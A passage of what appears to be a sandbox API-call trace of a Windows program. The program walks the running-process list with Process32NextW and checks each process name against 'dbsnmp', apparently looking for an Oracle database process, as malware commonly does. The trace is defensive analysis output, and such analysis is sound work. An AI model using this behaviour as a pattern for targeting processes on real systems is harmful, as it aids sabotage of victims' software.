lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0093.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.001] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35678c0 [0093.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x35678c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0093.001] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0093.001] StrStrIA (lpFirst="omnipos.exe", lpSrch="dbsnmp") returned 0x0 [0093.001] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0093.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0093.027] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3567800 [0093.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x3567800, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0093.027] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0093.027] StrStrIA (lpFirst="spcwin.exe", lpSrch="dbsnmp") returned 0x0 [0093.027] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0093.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0093.028] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x3567110 [0093.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x3567110, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0093.028] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0093.028] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="dbsnmp") returned 0x0 [0093.028] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0093.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0093.029] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x35677b8 [0093.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x35677b8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0093.029] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0093.029] StrStrIA (lpFirst="utg2.exe", lpSrch="dbsnmp") returned 0x0 [0093.029] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0093.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0093.030] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3567788 [0093.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x3567788, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0093.030] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0093.031] StrStrIA (lpFirst="saying.exe", lpSrch="dbsnmp") returned 0x0 [0093.031] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0093.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0093.032] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3567848 [0093.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x3567848, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0093.032] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0093.032] StrStrIA (lpFirst="ripe.exe", lpSrch="dbsnmp") returned 0x0 [0093.032] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0093.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.033] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35679e0 [0093.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x35679e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0093.033] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0093.033] StrStrIA (lpFirst="acoustic.exe", lpSrch="dbsnmp") returned 0x0 [0093.033] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0093.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0093.034] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3567968 [0093.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x3567968, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0093.034] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0093.034] StrStrIA (lpFirst="mail.exe", lpSrch="dbsnmp") returned 0x0 [0093.034] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0093.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.035] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35679c8 [0093.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x35679c8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0093.035] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0093.036] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="dbsnmp") returned 0x0 [0093.036] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.036] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35677a0 [0093.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35677a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.037] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.037] StrStrIA (lpFirst="svchost.exe", lpSrch="dbsnmp") returned 0x0 [0093.037] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0093.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.038] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3567878 [0093.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x3567878, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.038] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0093.038] StrStrIA (lpFirst="dllhost.exe", lpSrch="dbsnmp") returned 0x0 [0093.038] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0093.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.039] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3567818 [0093.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3567818, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0093.039] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0093.039] StrStrIA (lpFirst="taskhostw.exe", lpSrch="dbsnmp") returned 0x0 [0093.039] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0093.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.040] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3567830 [0093.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x3567830, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0093.040] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0093.040] StrStrIA (lpFirst="UsoClient.exe", lpSrch="dbsnmp") returned 0x0 [0093.040] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0093.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.041] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3567860 [0093.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3567860, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0093.041] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0093.041] StrStrIA (lpFirst="taskhostw.exe", lpSrch="dbsnmp") returned 0x0 [0093.041] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0093.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0093.042] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x3567170 [0093.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x3567170, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0093.042] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0093.042] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="dbsnmp") returned 0x0 [0093.042] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0093.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0093.043] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3567330 [0093.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x3567330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0093.043] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0093.043] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="dbsnmp") returned 0x0 [0093.043] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0093.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0093.044] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x35667a0 [0093.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x35667a0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppHostRegistrationVerifier.exe", lpUsedDefaultChar=0x0) returned 32 [0093.045] lstrcpyA (in: lpString1=0x567fabc, lpString2="AppHostRegistrationVerifier.exe" | out: lpString1="AppHostRegistrationVerifier.exe") returned="AppHostRegistrationVerifier.exe" [0093.045] StrStrIA (lpFirst="AppHostRegistrationVerifier.exe", lpSrch="dbsnmp") returned 0x0 [0093.045] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0093.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.046] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3567890 [0093.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3567890, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.046] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0093.046] StrStrIA (lpFirst="conhost.exe", lpSrch="dbsnmp") returned 0x0 [0093.046] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0093.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.047] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3567a28 [0093.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3567a28, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.047] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0093.047] StrStrIA (lpFirst="conhost.exe", lpSrch="dbsnmp") returned 0x0 [0093.047] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.048] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3567ba8 [0093.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3567ba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.048] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.048] StrStrIA (lpFirst="svchost.exe", lpSrch="dbsnmp") returned 0x0 [0093.048] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0093.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0093.049] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3567c08 [0093.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x3567c08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0093.049] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0093.050] StrStrIA (lpFirst="rxodge.exe", lpSrch="dbsnmp") returned 0x0 [0093.050] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0093.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0093.051] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3567b00 [0093.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x3567b00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0093.051] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0093.051] StrStrIA (lpFirst="sppsvc.exe", lpSrch="dbsnmp") returned 0x0 [0093.051] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0093.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0093.052] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3567030 [0093.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x3567030, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TrustedInstaller.exe", lpUsedDefaultChar=0x0) returned 21 [0093.052] lstrcpyA (in: 